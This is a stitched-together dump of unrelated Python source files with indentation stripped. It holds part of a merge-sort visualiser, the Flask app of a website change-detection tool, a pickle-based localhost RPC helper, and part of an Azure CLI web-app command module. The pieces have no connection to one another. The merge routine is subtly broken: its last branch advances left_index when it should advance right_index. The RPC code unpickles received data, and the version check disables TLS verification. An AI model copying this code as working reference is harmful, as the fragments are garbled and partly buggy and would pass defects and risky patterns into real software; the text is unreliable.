self.algorithm(data, middle + 1, right, drawData, delay)
self.merge(data, left, middle, right, drawData, delay)
def merge(self, data, left, middle, right, drawData, delay):
drawData(data, self.getColorArray(len(data), left, middle, right))
time.sleep(delay)
# left partition
left_partition = data[left: middle + 1]
# right partition
right_partition = data[middle + 1: right + 1]
left_index = 0
right_index = 0
for data_index in range(left, right + 1):
if left_index < len(left_partition) and right_index < len(right_partition):
if left_partition[left_index] <= right_partition[right_index]:
data[data_index] = left_partition[left_index]
left_index += 1
else:
data[data_index] = right_partition[right_index]
right_index += 1
elif left_index < len(left_partition):
data[data_index] = left_partition[left_index]
left_index += 1
else:
data[data_index] = right_partition[right_index]
left_index += 1
drawData(data, ["green" if x >= left and x <= right else "white" for x in range(len(data))])
time.sleep(delay)
def getColorArray(self, length, left, middle, right):
color_array = []
for i in range(length):
if i >= left and i <= right:
if i >= left and i <= middle:
color_array.append("yellow")
else:
color_array.append("red")
else:
color_array.append("white")
return color_array
# Test this tonight |
__init__.py | #!/usr/bin/python3
# @todo logging
# @todo extra options for url like , verify=False etc.
# @todo enable https://urllib3.readthedocs.io/en/latest/user-guide.html#ssl as option?
# @todo option for interval day/6 hour/etc
# @todo on change detected, config for calling some API
# @todo make tables responsive!
# @todo fetch title into json
# https://distill.io/features
# proxy per check
# - flask_cors, itsdangerous,MarkupSafe
import time
import os
import timeago
import threading
from threading import Event
import queue
from flask import Flask, render_template, request, send_file, send_from_directory, abort, redirect, url_for
from feedgen.feed import FeedGenerator
from flask import make_response
import datetime
import pytz
datastore = None
# Local
running_update_threads = []
ticker_thread = None
messages = []
extra_stylesheets = []
update_q = queue.Queue()
app = Flask(__name__, static_url_path="/var/www/change-detection/backen/static")
# Stop browser caching of assets
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
app.config.exit = Event()
app.config['NEW_VERSION_AVAILABLE'] = False
# Disables caching of the templates
app.config['TEMPLATES_AUTO_RELOAD'] = True
# We use the whole watch object from the store/JSON so we can see if there's some related status in terms of a thread
# running or something similar.
@app.template_filter('format_last_checked_time')
def _jinja2_filter_datetime(watch_obj, format="%Y-%m-%d %H:%M:%S"):
# Worker thread tells us which UUID it is currently processing.
for t in running_update_threads:
if t.current_uuid == watch_obj['uuid']:
return "Checking now.."
if watch_obj['last_checked'] == 0:
return 'Not yet'
return timeago.format(int(watch_obj['last_checked']), time.time())
# @app.context_processor
# def timeago():
# def _timeago(lower_time, now):
# return timeago.format(lower_time, now)
# return dict(timeago=_timeago)
@app.template_filter('format_timestamp_timeago')
def _jinja2_filter_datetimestamp(timestamp, format="%Y-%m-%d %H:%M:%S"):
return timeago.format(timestamp, time.time())
# return timeago.format(timestamp, time.time())
# return datetime.datetime.utcfromtimestamp(timestamp).strftime(format)
def changedetection_app(config=None, datastore_o=None):
global datastore
datastore = datastore_o
app.config.update(dict(DEBUG=True))
app.config.update(config or {})
# Setup cors headers to allow all domains
# https://flask-cors.readthedocs.io/en/latest/
# CORS(app)
# https://github.com/pallets/flask/blob/93dd1709d05a1cf0e886df6223377bdab3b077fb/examples/tutorial/flaskr/__init__.py#L39
# You can divide up the stuff like this
@app.route("/", methods=['GET'])
def index():
global messages
limit_tag = request.args.get('tag')
pause_uuid = request.args.get('pause')
if pause_uuid:
try:
datastore.data['watching'][pause_uuid]['paused'] ^= True
datastore.needs_write = True
return redirect(url_for('index', tag = limit_tag))
except KeyError:
pass
# Sort by last_changed and add the uuid which is usually the key..
sorted_watches = []
for uuid, watch in datastore.data['watching'].items():
if limit_tag != None:
# Support for comma separated list of tags.
for tag_in_watch in watch['tag'].split(','):
tag_in_watch = tag_in_watch.strip()
if tag_in_watch == limit_tag:
watch['uuid'] = uuid
sorted_watches.append(watch)
else:
watch['uuid'] = uuid
sorted_watches.append(watch)
sorted_watches.sort(key=lambda x: x['last_changed'], reverse=True)
existing_tags = datastore.get_all_tags()
rss = request.args.get('rss')
if rss:
fg = FeedGenerator()
fg.title('changedetection.io')
fg.description('Feed description')
fg.link(href='https://changedetection.io')
for watch in sorted_watches:
if not watch['viewed']:
fe = fg.add_entry()
fe.title(watch['url'])
fe.link(href=watch['url'])
fe.description(watch['url'])
fe.guid(watch['uuid'], permalink=False)
dt = datetime.datetime.fromtimestamp(int(watch['newest_history_key']))
dt = dt.replace(tzinfo=pytz.UTC)
fe.pubDate(dt)
response = make_response(fg.rss_str())
response.headers.set('Content-Type', 'application/rss+xml')
return response
else:
output = render_template("watch-overview.html",
watches=sorted_watches,
messages=messages,
tags=existing_tags,
active_tag=limit_tag,
has_unviewed=datastore.data['has_unviewed'])
# Show messages but once.
messages = []
return output
@app.route("/scrub", methods=['GET', 'POST'])
def scrub_page():
from pathlib import Path
global messages
if request.method == 'POST':
confirmtext = request.form.get('confirmtext')
limit_timestamp = int(request.form.get('limit_date'))
if confirmtext == 'scrub':
for uuid, watch in datastore.data['watching'].items():
if len(str(limit_timestamp)) == 10:
datastore.scrub_watch(uuid, limit_timestamp = limit_timestamp)
else:
datastore.scrub_watch(uuid)
messages.append({'class': 'ok', 'message': 'Cleaned all version history.'})
else:
messages.append({'class': 'error', 'message': 'Wrong confirm text.'})
return redirect(url_for('index'))
return render_template("scrub.html")
# If they edited an existing watch, we need to know to reset the current/previous md5 to include
# the excluded text.
def get_current_checksum_include_ignore_text(uuid):
import hashlib
from backend import fetch_site_status
# Get the most recent one
newest_history_key = datastore.get_val(uuid, 'newest_history_key')
# 0 means that theres only one, so that there should be no 'unviewed' history availabe
if newest_history_key == 0:
newest_history_key = list(datastore.data['watching'][uuid]['history'].keys())[0]
if newest_history_key:
with open(datastore.data['watching'][uuid]['history'][newest_history_key],
encoding='utf-8') as file:
raw_content = file.read()
handler = fetch_site_status.perform_site_check(datastore=datastore)
stripped_content = handler.strip_ignore_text(raw_content,
datastore.data['watching'][uuid]['ignore_text'])
checksum = hashlib.md5(stripped_content).hexdigest()
return checksum
return datastore.data['watching'][uuid]['previous_md5']
@app.route("/edit/<string:uuid>", methods=['GET', 'POST'])
def edit_page(uuid):
global messages
import validators
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
if request.method == 'POST':
url = request.form.get('url').strip()
tag = request.form.get('tag').strip()
# Extra headers
form_headers = request.form.get('headers').strip().split("\n")
extra_headers = {}
if form_headers:
for header in form_headers:
if len(header):
parts = header.split(':', 1)
if len(parts) == 2:
extra_headers.update({parts[0].strip(): parts[1].strip()})
update_obj = {'url': url,
'tag': tag,
'headers': extra_headers
}
# Ignore text
form_ignore_text = request.form.get('ignore-text').strip()
ignore_text = []
if len(form_ignore_text):
for text in form_ignore_text.split("\n"):
text = text.strip()
if len(text):
ignore_text.append(text)
datastore.data['watching'][uuid]['ignore_text'] = ignore_text
# Reset the previous_md5 so we process a new snapshot including stripping ignore text.
if len(datastore.data['watching'][uuid]['history']):
update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
validators.url(url) # @todo switch to prop/attr/observer
datastore.data['watching'][uuid].update(update_obj)
datastore.needs_write = True
messages.append({'class': 'ok', 'message': 'Updated watch.'})
return redirect(url_for('index'))
else:
output = render_template("edit.html", uuid=uuid, watch=datastore.data['watching'][uuid], messages=messages)
return output
@app.route("/settings", methods=['GET', "POST"])
def settings_page():
global messages
if request.method == 'POST':
try:
minutes = int(request.values.get('minutes').strip())
except ValueError:
messages.append({'class': 'error', 'message': "Invalid value given, use an integer."})
else:
if minutes >= 5:
datastore.data['settings']['requests']['minutes_between_check'] = minutes
datastore.needs_write = True
messages.append({'class': 'ok', 'message': "Updated"})
else:
messages.append(
{'class': 'error', 'message': "Must be atleast 5 minutes."})
output = render_template("settings.html", messages=messages,
minutes=datastore.data['settings']['requests']['minutes_between_check'])
messages = []
return output
@app.route("/import", methods=['GET', "POST"])
def import_page():
import validators
global messages
remaining_urls = []
good = 0
if request.method == 'POST':
urls = request.values.get('urls').split("\n")
for url in urls:
url = url.strip()
if len(url) and validators.url(url):
new_uuid = datastore.add_watch(url=url.strip(), tag="")
# Straight into the queue.
update_q.put(new_uuid)
good += 1
else:
if len(url):
remaining_urls.append(url)
messages.append({'class': 'ok', 'message': "{} Imported, {} Skipped.".format(good, len(remaining_urls))})
if len(remaining_urls) == 0:
# Looking good, redirect to index.
return redirect(url_for('index'))
# Could be some remaining, or we could be on GET
output = render_template("import.html",
messages=messages,
remaining="\n".join(remaining_urls)
)
messages = []
return output
# Clear all statuses, so we do not see the 'unviewed' class
@app.route("/api/mark-all-viewed", methods=['GET'])
def mark_all_viewed():
# Save the current newest history as the most recently viewed
for watch_uuid, watch in datastore.data['watching'].items():
datastore.set_last_viewed(watch_uuid, watch['newest_history_key'])
messages.append({'class': 'ok', 'message': "Cleared all statuses."})
return redirect(url_for('index'))
@app.route("/diff/<string:uuid>", methods=['GET'])
def diff_history_page(uuid):
global messages
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = ['/static/css/diff.css']
try:
watch = datastore.data['watching'][uuid]
except KeyError:
messages.append({'class': 'error', 'message': "No history found for the specified link, bad link?"})
return redirect(url_for('index'))
dates = list(watch['history'].keys())
# Convert to int, sort and back to str again
dates = [int(i) for i in dates]
dates.sort(reverse=True)
dates = [str(i) for i in dates]
if len(dates) < 2:
messages.append(
{'class': 'error', 'message': "Not enough saved change detection snapshots to produce a report."})
return redirect(url_for('index'))
# Save the current newest history as the most recently viewed
datastore.set_last_viewed(uuid, dates[0])
newest_file = watch['history'][dates[0]]
with open(newest_file, 'r') as f:
newest_version_file_contents = f.read()
previous_version = request.args.get('previous_version')
try:
previous_file = watch['history'][previous_version]
except KeyError:
# Not present, use a default value, the second one in the sorted list.
previous_file = watch['history'][dates[1]]
with open(previous_file, 'r') as f:
previous_version_file_contents = f.read()
output = render_template("diff.html", watch_a=watch,
messages=messages,
newest=newest_version_file_contents,
previous=previous_version_file_contents,
extra_stylesheets=extra_stylesheets,
versions=dates[1:],
newest_version_timestamp=dates[0],
current_previous_version=str(previous_version),
current_diff_url=watch['url'])
return output
@app.route("/preview/<string:uuid>", methods=['GET'])
def preview_page(uuid):
global messages
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = ['/static/css/diff.css']
try:
watch = datastore.data['watching'][uuid]
except KeyError:
messages.append({'class': 'error', 'message': "No history found for the specified link, bad link?"})
return redirect(url_for('index'))
print(watch)
with open(list(watch['history'].values())[-1], 'r') as f:
content = f.readlines()
output = render_template("preview.html", content=content, extra_stylesheets=extra_stylesheets)
return output
@app.route("/favicon.ico", methods=['GET'])
def favicon():
return send_from_directory("/app/static/images", filename="favicon.ico")
# We're good but backups are even better!
@app.route("/backup", methods=['GET'])
def get_backup():
import zipfile
from pathlib import Path
# create a ZipFile object
backupname = "changedetection-backup-{}.zip".format(int(time.time()))
# We only care about UUIDS from the current index file
uuids = list(datastore.data['watching'].keys())
backup_filepath = os.path.join(app.config['datastore_path'], backupname)
with zipfile.ZipFile(backup_filepath, "w",
compression=zipfile.ZIP_DEFLATED,
compresslevel=8) as zipObj:
# Be sure we're written fresh
datastore.sync_to_json()
# Add the index
zipObj.write(os.path.join(app.config['datastore_path'], "url-watches.json"), arcname="url-watches.json")
# Add any snapshot data we find, use the full path to access the file, but make the file 'relative' in the Zip.
for txt_file_path in Path(app.config['datastore_path']).rglob('*.txt'):
parent_p = txt_file_path.parent
if parent_p.name in uuids:
zipObj.write(txt_file_path,
arcname=str(txt_file_path).replace(app.config['datastore_path'], ''),
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8)
return send_from_directory(app.config['datastore_path'], backupname)
@app.route("/static/<string:group>/<string:filename>", methods=['GET'])
def static_content(group, filename):
# These files should be in our subdirectory
full_path = os.path.realpath(__file__)
p = os.path.dirname(full_path)
try:
return send_from_directory("{}/static/{}".format(p, group), filename=filename)
except FileNotFoundError:
abort(404)
@app.route("/api/add", methods=['POST'])
def api_watch_add():
global messages
url = request.form.get('url').strip()
if datastore.url_exists(url):
messages.append({'class': 'error', 'message': 'The URL {} already exists'.format(url)})
return redirect(url_for('index'))
# @todo add_watch should throw a custom Exception for validation etc
new_uuid = datastore.add_watch(url=url, tag=request.form.get('tag').strip())
# Straight into the queue.
update_q.put(new_uuid)
messages.append({'class': 'ok', 'message': 'Watch added.'})
return redirect(url_for('index'))
@app.route("/api/delete", methods=['GET'])
def api_delete():
global messages
uuid = request.args.get('uuid')
datastore.delete(uuid)
messages.append({'class': 'ok', 'message': 'Deleted.'})
return redirect(url_for('index'))
@app.route("/api/checknow", methods=['GET'])
def api_watch_checknow():
global messages
tag = request.args.get('tag')
uuid = request.args.get('uuid')
i = 0
running_uuids = []
for t in running_update_threads:
running_uuids.append(t.current_uuid)
# @todo check thread is running and skip
if uuid:
if uuid not in running_uuids:
update_q.put(uuid)
i = 1
elif tag != None:
# Items that have this current tag
for watch_uuid, watch in datastore.data['watching'].items():
if (tag != None and tag in watch['tag']):
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
else:
# No tag, no uuid, add everything.
for watch_uuid, watch in datastore.data['watching'].items():
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
messages.append({'class': 'ok', 'message': "{} watches are rechecking.".format(i)})
return redirect(url_for('index', tag=tag))
# @todo handle ctrl break
ticker_thread = threading.Thread(target=ticker_thread_check_time_launch_checks).start()
# Check for new release version
threading.Thread(target=check_for_new_version).start()
return app
# Check for new version and anonymous stats
def check_for_new_version():
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
while not app.config.exit.is_set():
try:
r = requests.post("https://changedetection.io/check-ver.php",
data={'version': datastore.data['version_tag'],
'app_guid': datastore.data['app_guid']},
verify=False)
except:
pass
try:
if "new_version" in r.text:
app.config['NEW_VERSION_AVAILABLE'] = True
except:
pass
# Check daily
app.config.exit.wait(86400)
# Requests for checking on the site use a pool of thread Workers managed by a Queue.
class Worker(threading.Thread):
current_uuid = None
def __init__(self, q, *args, **kwargs):
self.q = q
super().__init__(*args, **kwargs)
def run(self):
from backend import fetch_site_status
update_handler = fetch_site_status.perform_site_check(datastore=datastore)
while not app.config.exit.is_set():
try:
uuid = self.q.get(block=False)
except queue.Empty:
pass
else:
self.current_uuid = uuid
if uuid in list(datastore.data['watching'].keys()):
try:
changed_detected, result, contents = update_handler.run(uuid)
except PermissionError as s:
app.logger.error("File permission error updating", uuid, str(s))
else:
if result:
datastore.update_watch(uuid=uuid, update_obj=result)
if changed_detected:
# A change was detected
datastore.save_history_text(uuid=uuid, contents=contents, result_obj=result)
self.current_uuid = None # Done
self.q.task_done()
app.config.exit.wait(1)
# Thread runner to check every minute, look for new watches to feed into the Queue.
def ticker_thread_check_time_launch_checks():
# Spin up Workers.
for _ in range(datastore.data['settings']['requests']['workers']):
new_worker = Worker(update_q)
running_update_threads.append(new_worker)
new_worker.start()
while not app.config.exit.is_set():
running_uuids = []
for t in running_update_threads:
if t.current_uuid:
running_uuids.append(t.current_uuid)
# Look at the dataset, find a stale watch to process
# Every minute check for new UUIDs to follow up on, should be inside the loop incase it changes.
minutes = datastore.data['settings']['requests']['minutes_between_check']
threshold = time.time() - (minutes * 60)
for uuid, watch in datastore.data['watching'].items():
if not watch['paused'] and watch['last_checked'] <= threshold:
if not uuid in running_uuids and uuid not in update_q.queue:
update_q.put(uuid)
# Should be low so we can break this out in testing
app.config.exit.wait(1)
|
rpc.py | import threading
import pickle
import sys
import logging
import msgpackrpc
import tblib
import uuid
import functools
logger = logging.getLogger(__name__)
class Base(object):
def __init__(self):
self._server = msgpackrpc.Server(self)
self._blocking_thread = None
self._id = str(uuid.uuid1())
def start(self):
self._server.listen(msgpackrpc.Address("127.0.0.1", 0))
self._blocking_thread = threading.Thread(target=self._server.start)
self._blocking_thread.start()
logger.debug("server {} started".format(self._id))
def join(self, timeout=None):
self._blocking_thread.join(timeout)
def ensure_stopped(self, timeout=None):
self._server.stop()
self._blocking_thread.join(timeout)
logger.debug("server {} stopped".format(self._id))
def get_port(self):
return list(self._server._listeners[0]._mp_server._sockets.values())[0].getsockname()[1]
def get_id(self):
return self._id
class ServerMixin(object):
def wait_for_worker(self, timeout=None):
self._client_ack_event.wait(timeout)
assert self._client_ack_event.is_set()
def ack(self, client_port):
logger.debug("server {} got ack".format(self._id))
self._client_port = client_port
self._client_ack_event.set()
def log(self, log_record):
try:
record = pickle.loads(log_record)
if record.exc_info:
record.exc_info = (record.exc_info[0], record.exc_info[1], tblib.Traceback(record.exc_info[2].as_traceback()))
logging.getLogger(record.name).handle(record)
except:
pass
def get_child_port(self):
return self._client_port
class Server(Base, ServerMixin):
def __init__(self):
super(Server, self).__init__()
self._client_ack_event = threading.Event()
self._client_port = None
def rpc_result(func):
from infi.traceback import traceback_decorator
@traceback_decorator
@functools.wraps(func)
def wrapper(*args, **kwargs):
try:
result = dict(code='success', result=func(*args, **kwargs))
except:
logger.exception("Exception in child rpc_result")
_type, value, _tb = sys.exc_info()
exc_info = (_type, value, tblib.Traceback(_tb))
result = dict(code='error', result=exc_info)
logger.debug("returning {!r} for".format(result))
return pickle.dumps(result)
return wrapper
class ChildServerMixin(object):
@rpc_result
def run_method(self, instance, method_name, args, kwargs):
instance = pickle.loads(instance)
method_name = pickle.loads(method_name)
args = pickle.loads(args)
kwargs = pickle.loads(kwargs)
method = getattr(instance, method_name)
logger.debug("running {!r} {!r} {!r}".format(method, args, kwargs))
return method(*args, **kwargs)
@rpc_result
def run_func(self, target, args, kwargs):
target = pickle.loads(target)
args = pickle.loads(args)
kwargs = pickle.loads(kwargs)
logger.debug("running {!r} {!r} {!r}".format(target, args, kwargs))
return target(*args, **kwargs)
def shutdown(self):
logger.debug('child server {!r} shutting down'.format(self.get_id()))
self._server.close()
self._server.stop()
class ChildServer(Base, ChildServerMixin):
pass
class Client(msgpackrpc.Client):
def __init__(self, port, timeout=None):
super(Client, self).__init__(msgpackrpc.Address("127.0.0.1", port), timeout=timeout)
self._port = port
def get_port(self):
return self._port
timeout_exceptions = (msgpackrpc.error.TimeoutError, )
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import OpenSSL.crypto
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.web.models import (Site, SiteConfig, User, AppServicePlan, SiteConfigResource,
SkuDescription, SslState, HostNameBinding, NameValuePair,
BackupRequest, DatabaseBackupSetting, BackupSchedule,
RestoreRequest, FrequencyUnit, Certificate, HostNameSslState,
RampUpRule, UnauthenticatedClientAction)
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.prompting import prompt_pass, NoTTYException
import azure.cli.core.azlogging as azlogging
from azure.cli.core.util import CLIError
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import _generic_site_operation, _generic_settings_operation, AUTH_TYPES
from ._client_factory import web_client_factory, ex_handler_factory
logger = azlogging.get_az_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
def create_webapp(resource_group_name, name, plan, runtime=None, startup_file=None,
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None):
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
client = web_client_factory()
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
is_linux = plan_info.reserved
location = plan_info.location
site_config = SiteConfig(app_settings=[])
webapp_def = Site(server_farm_id=plan_info.id, location=location, site_config=site_config)
if is_linux:
if runtime and deployment_container_image_name:
raise CLIError('usage error: --runtime | --deployment-container-image-name')
if startup_file:
site_config.app_command_line = startup_file
if runtime:
site_config.linux_fx_version = runtime
elif deployment_container_image_name:
site_config.linux_fx_version = _format_linux_fx_version(deployment_container_image_name)
site_config.app_settings.append(NameValuePair("WEBSITES_ENABLE_APP_SERVICE_STORAGE", "false"))
else: # must specify runtime
raise CLIError('usage error: must specify --runtime | --deployment-container-image-name') # pylint: disable=line-too-long
elif runtime: # windows webapp
if startup_file or deployment_container_image_name:
raise CLIError("usage error: --startup-file or --deployment-container-image-name is "
"only appliable on linux webapp")
helper = _StackRuntimeHelper(client)
match = helper.resolve(runtime)
if not match:
raise CLIError("Runtime '{}' is not supported. Please invoke 'list-runtimes' to cross check".format(runtime)) # pylint: disable=line-too-long
match['setter'](match, site_config)
# Be consistent with portal: any windows webapp should have this even it doesn't have node in the stack
if not match['displayName'].startswith('node'):
site_config.app_settings.append(NameValuePair("WEBSITE_NODE_DEFAULT_VERSION", "6.9.1"))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation()(poller)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(webapp, resource_group_name, name)
return webapp
def show_webapp(resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(resource_group_name, name, 'get', slot)
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(webapp, resource_group_name, name, slot)
return webapp
def update_webapp(instance, client_affinity_enabled=None):
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
return instance
def list_webapp(resource_group_name=None):
return _list_app(['app', 'app,linux'], resource_group_name)
def list_function_app(resource_group_name=None):
return _list_app(['functionapp', 'functionapp,linux'], resource_group_name)
def _list_app(app_types, resource_group_name=None):
client = web_client_factory()
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
result = [x for x in result if x.kind in app_types]
for webapp in result:
_rename_server_farm_props(webapp)
return result
def get_auth_settings(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'get_auth_settings', slot)
def update_auth_settings(resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, # pylint: disable=unused-argument
runtime_version=None, token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(resource_group_name, name, slot)
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
print(arg, values[arg])
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_runtimes(linux=False):
client = web_client_factory()
if linux:
# workaround before API is exposed
logger.warning('You are viewing an offline list of runtimes. For up to date list, '
'check out https://aka.ms/linux-stacks')
return ['node|6.4', 'node|4.5', 'node|6.2', 'node|6.6', 'node|6.9', 'node|6.10',
'php|5.6', 'php|7.0', 'dotnetcore|1.0', 'dotnetcore|1.1', 'ruby|2.3']
runtime_helper = _StackRuntimeHelper(client)
return [s['displayName'] for s in runtime_helper.stacks]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'delete', slot)
def delete_webapp(resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory()
delete_method = getattr(client.web_apps, 'delete' if slot is None else 'delete_slot')
delete_method(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'stop', slot)
def start_webapp(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'start', slot)
def restart_webapp(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'restart', slot)
def get_site_configs(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'get_configuration', slot)
def get_app_settings(resource_group_name, name, slot=None):
result = _generic_site_operation(resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory()
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
def get_connection_strings(resource_group_name, name, slot=None):
result = _generic_site_operation(resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory()
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def _fill_ftp_publishing_url(webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_linux_fx_version(custom_image_name):
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_linux_fx_version(resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_linux_fx_version(custom_image_name)
return update_site_configs(resource_group_name, name, linux_fx_version=fx_version, slot=slot)
def _delete_linux_fx_version(resource_group_name, name, slot=None):
fx_version = ' '
return update_site_configs(resource_group_name, name, linux_fx_version=fx_version, slot=slot)
def _get_linux_fx_version(resource_group_name, name, slot=None):
site_config = get_site_configs(resource_group_name, name, slot)
return site_config.linux_fx_version
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
def update_site_configs(resource_group_name, name, slot=None,
linux_fx_version=None, php_version=None, python_version=None, # pylint: disable=unused-argument
net_framework_version=None, # pylint: disable=unused-argument
java_version=None, java_container=None, java_container_version=None, # pylint: disable=unused-argument
remote_debugging_enabled=None, web_sockets_enabled=None, # pylint: disable=unused-argument
always_on=None, auto_heal_enabled=None, # pylint: disable=unused-argument
use32_bit_worker_process=None, # pylint: disable=unused-argument
app_command_line=None): # pylint: disable=unused-argument
configs = get_site_configs(resource_group_name, name, slot)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(resource_group_name, name, 'update_configuration', slot, configs)
def update_app_settings(resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(resource_group_name, name,
'list_application_settings', slot)
for name_value in settings + slot_settings:
# split at the first '=', appsetting should not have '=' in the name
settings_name, value = name_value.split('=', 1)
app_settings.properties[settings_name] = value
client = web_client_factory()
result = _generic_settings_operation(resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def delete_app_settings(resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory()
